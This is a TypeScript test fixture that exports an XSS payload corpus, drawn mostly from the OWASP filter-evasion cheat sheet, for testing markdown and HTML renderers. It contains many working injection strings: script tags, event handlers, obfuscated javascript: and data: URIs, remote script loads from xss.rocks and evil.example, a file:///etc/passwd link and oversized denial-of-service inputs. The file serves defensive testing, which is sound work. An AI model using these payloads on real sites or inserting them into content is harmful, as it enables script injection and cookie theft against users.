// XSS payload corpus, drawn mostly from the OWASP XSS Filter Evasion Cheat
// Sheet (https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html)
// plus markdown-specific vectors. Every renderer of untrusted content is run
// against every vector in src/components/__tests__/xss.corpus.test.tsx.

/** HTML / markup payloads. */
export const HTML_VECTORS: string[] = [
  `<script>alert(1)</script>`,
  `<SCRIPT SRC=https://xss.rocks/xss.js></SCRIPT>`,
  `<script src=//xss.rocks/xss.js></script>`,
  `<IMG SRC="javascript:alert('XSS');">`,
  `<IMG SRC=javascript:alert('XSS')>`,
  `<IMG SRC=JaVaScRiPt:alert('XSS')>`,
  "<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>",
  `<a onmouseover="alert(document.cookie)">xxs link</a>`,
  `<a onmouseover=alert(document.cookie)>xxs link</a>`,
  `<IMG """><SCRIPT>alert("XSS")</SCRIPT>"\\>`,
  `<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`,
  `<IMG SRC=# onmouseover="alert('xxs')">`,
  `<IMG SRC= onmouseover="alert('xxs')">`,
  `<IMG onmouseover="alert('xxs')">`,
  `<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>`,
  `<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">`,
  `<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>`,
  `<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>`,
  `<IMG SRC="jav	ascript:alert('XSS');">`,
  `<IMG SRC="jav&#x09;ascript:alert('XSS');">`,
  `<IMG SRC="jav&#x0A;ascript:alert('XSS');">`,
  `<IMG SRC="jav&#x0D;ascript:alert('XSS');">`,
  `<IMG SRC=" &#14;  javascript:alert('XSS');">`,
  `<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT>`,
  `<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^\`=alert("XSS")>`,
  `<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>`,
  `<<SCRIPT>alert("XSS");//\\<</SCRIPT>`,
  `<SCRIPT SRC=http://xss.rocks/xss.js?< B >`,
  `<SCRIPT SRC=//xss.rocks/.j>`,
  `<IMG SRC="\`<javascript:alert>\`('XSS')"`,
  `<iframe src=http://xss.rocks/scriptlet.html <`,
  `\\";alert('XSS');//`,
  `</TITLE><SCRIPT>alert("XSS");</SCRIPT>`,
  `<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">`,
  `<BODY BACKGROUND="javascript:alert('XSS')">`,
  `<IMG DYNSRC="javascript:alert('XSS')">`,
  `<IMG LOWSRC="javascript:alert('XSS')">`,
  `<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>`,
  `<IMG SRC='vbscript:msgbox("XSS")'>`,
  `<svg/onload=alert('XSS')>`,
  `<svg><script>alert(1)</script></svg>`,
  `<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a></svg>`,
  `<math><mtext><table><mglyph><style><img src=x onerror=alert(1)>`,
  `<BODY ONLOAD=alert('XSS')>`,
  `<BGSOUND SRC="javascript:alert('XSS');">`,
  `<BR SIZE="&{alert('XSS')}">`,
  `<LINK REL="stylesheet" HREF="javascript:alert('XSS');">`,
  `<LINK REL="stylesheet" HREF="http://xss.rocks/xss.css">`,
  `<STYLE>@import'http://xss.rocks/xss.css';</STYLE>`,
  `<META HTTP-EQUIV="Link" Content="<http://xss.rocks/xss.css>; REL=stylesheet">`,
  `<STYLE>BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}</STYLE>`,
  `<STYLE>@im\\port'\\ja\\vasc\\ript:alert("XSS")';</STYLE>`,
  `<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">`,
  `<STYLE TYPE="text/javascript">alert('XSS');</STYLE>`,
  `<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>`,
  `<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>`,
  `<XSS STYLE="behavior: url(xss.htc);">`,
  `<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">`,
  `<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">`,
  `<IFRAME SRC="javascript:alert('XSS');"></IFRAME>`,
  `<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>`,
  `<iframe srcdoc="<script>alert(1)</script>"></iframe>`,
  `<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>`,
  `<TABLE BACKGROUND="javascript:alert('XSS')">`,
  `<TABLE><TD BACKGROUND="javascript:alert('XSS')">`,
  `<DIV STYLE="background-image: url(javascript:alert('XSS'))">`,
  `<DIV STYLE="background-image:\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\0029">`,
  `<DIV STYLE="width: expression(alert('XSS'));">`,
  `<BASE HREF="javascript:alert('XSS');//">`,
  `<OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/scriptlet.html"></OBJECT>`,
  `<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>`,
  `<SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT>`,
  `<SCRIPT ="blah" SRC="httx://xss.rocks/xss.js"></SCRIPT>`,
  `<SCRIPT a=\`>\` SRC="httx://xss.rocks/xss.js"></SCRIPT>`,
  `<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>`,
  `<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>`,
  `<form action="javascript:alert(1)"><button>go</button></form>`,
  `<button formaction="javascript:alert(1)">x</button>`,
  `<details open ontoggle=alert(1)>`,
  `<video><source onerror="alert(1)">`,
  `<audio src=x onerror=alert(1)>`,
  `<marquee onstart=alert(1)>`,
  `<object data="javascript:alert(1)">`,
  `<isindex action=javascript:alert(1) type=image>`,
  `<a href="&#106;avascript:alert(1)">x</a>`,
  `<a href="  javascript:alert(1)">x</a>`,
  `<a href="java\u0000script:alert(1)">x</a>`,
  `<noscript><p title="</noscript><img src=x onerror=alert(1)>">`,
  `<template><script>alert(1)</script></template>`,
  `<!--<img src="--><img src=x onerror=alert(1)//">`,
  `<![CDATA[<script>alert(1)</script>]]>`,
  `<xmp><img src=x onerror=alert(1)></xmp>`,
  `<textarea><script>alert(1)</script></textarea>`,
  `<div id="x" name="cookie">clobber</div>`,
  `<form name="getElementById"></form>`,
  `"><script>alert(document.domain)</script>`,
  `'><img src=x onerror=alert(1)>`,
];

/** URL payloads, embedded into several markdown constructs below. */
export const URL_VECTORS: string[] = [
  `javascript:alert(1)`,
  `JaVaScRiPt:alert(1)`,
  `javascript&colon;alert(1)`,
  `javas&#99;ript:alert(1)`,
  `&#x6A;avascript:alert(1)`,
  `java%0ascript:alert(1)`,
  `java%09script:alert(1)`,
  `%6A%61%76%61%73%63%72%69%70%74%3Aalert(1)`,
  ` javascript:alert(1)`,
  `\u0001javascript:alert(1)`,
  `javascript://%0Aalert(1)`,
  `javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>`,
  `vbscript:msgbox(1)`,
  `VBScript:msgbox(1)`,
  `data:text/html,<script>alert(1)</script>`,
  `data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==`,
  `data:image/svg+xml,<svg onload=alert(1)>`,
  `DATA:text/html,<script>alert(1)</script>`,
  `file:///etc/passwd`,
  `//evil.example/x.js`,
  `\\\\evil.example\\x`,
  `https://user:pass@evil.example/`,
  `livescript:alert(1)`,
  `mocha:alert(1)`,
  `jar:https://evil.example!/`,
  `ftp://evil.example/`,
  `blob:https://evil.example/uuid`,
  `about:blank`,
  `chrome://settings`,
  `https://evil.example/"onmouseover="alert(1)`,
];

/** Markdown-specific constructs. */
export const MARKDOWN_VECTORS: string[] = [
  `[a](javascript:alert(1) "title")`,
  `[a]( javascript:alert(1))`,
  `[a](<javascript:alert(1)>)`,
  `[a][ref]\n\n[ref]: javascript:alert(1)`,
  `![a](https://evil.example/tracker.png)`,
  `![a](https://evil.example/x.png"onerror="alert(1))`,
  `<javascript:alert(1)>`,
  `<https://evil.example/ok>`,
  `[<img src=x onerror=alert(1)>](https://ok.example)`,
  `**<script>alert(1)</script>**`,
  "```html\n<script>alert(1)</script>\n```",
  "`<img src=x onerror=alert(1)>`",
  `> <iframe src="javascript:alert(1)"></iframe>`,
  `| a | b |\n|---|---|\n| <script>alert(1)</script> | x |`,
  `[x](https://ok.example){onclick=alert(1)}`,
  `Click [here](https://ok.example "\\" onmouseover=\\"alert(1)")`,
  `‮gnp.exe`,
  `name​​hidden`,
  `A`.repeat(50_000),
  `[`.repeat(10_000) + `a` + `](x)`.repeat(10_000),
];

/** Everything, markdown-wrapped variants included. */
export function buildCorpus(): { name: string; payload: string }[] {
  const out: { name: string; payload: string }[] = [];
  HTML_VECTORS.forEach((p, i) => out.push({ name: `html#${i}`, payload: p }));
  URL_VECTORS.forEach((u, i) => {
    out.push({ name: `url-link#${i}`, payload: `[click](${u})` });
    out.push({ name: `url-image#${i}`, payload: `![img](${u})` });
    out.push({ name: `url-ref#${i}`, payload: `[click][r]\n\n[r]: ${u}` });
    out.push({ name: `url-autolink#${i}`, payload: `<${u}>` });
    out.push({ name: `url-raw-anchor#${i}`, payload: `<a href="${u}">x</a>` });
  });
  MARKDOWN_VECTORS.forEach((p, i) => out.push({ name: `md#${i}`, payload: p }));
  return out;
}
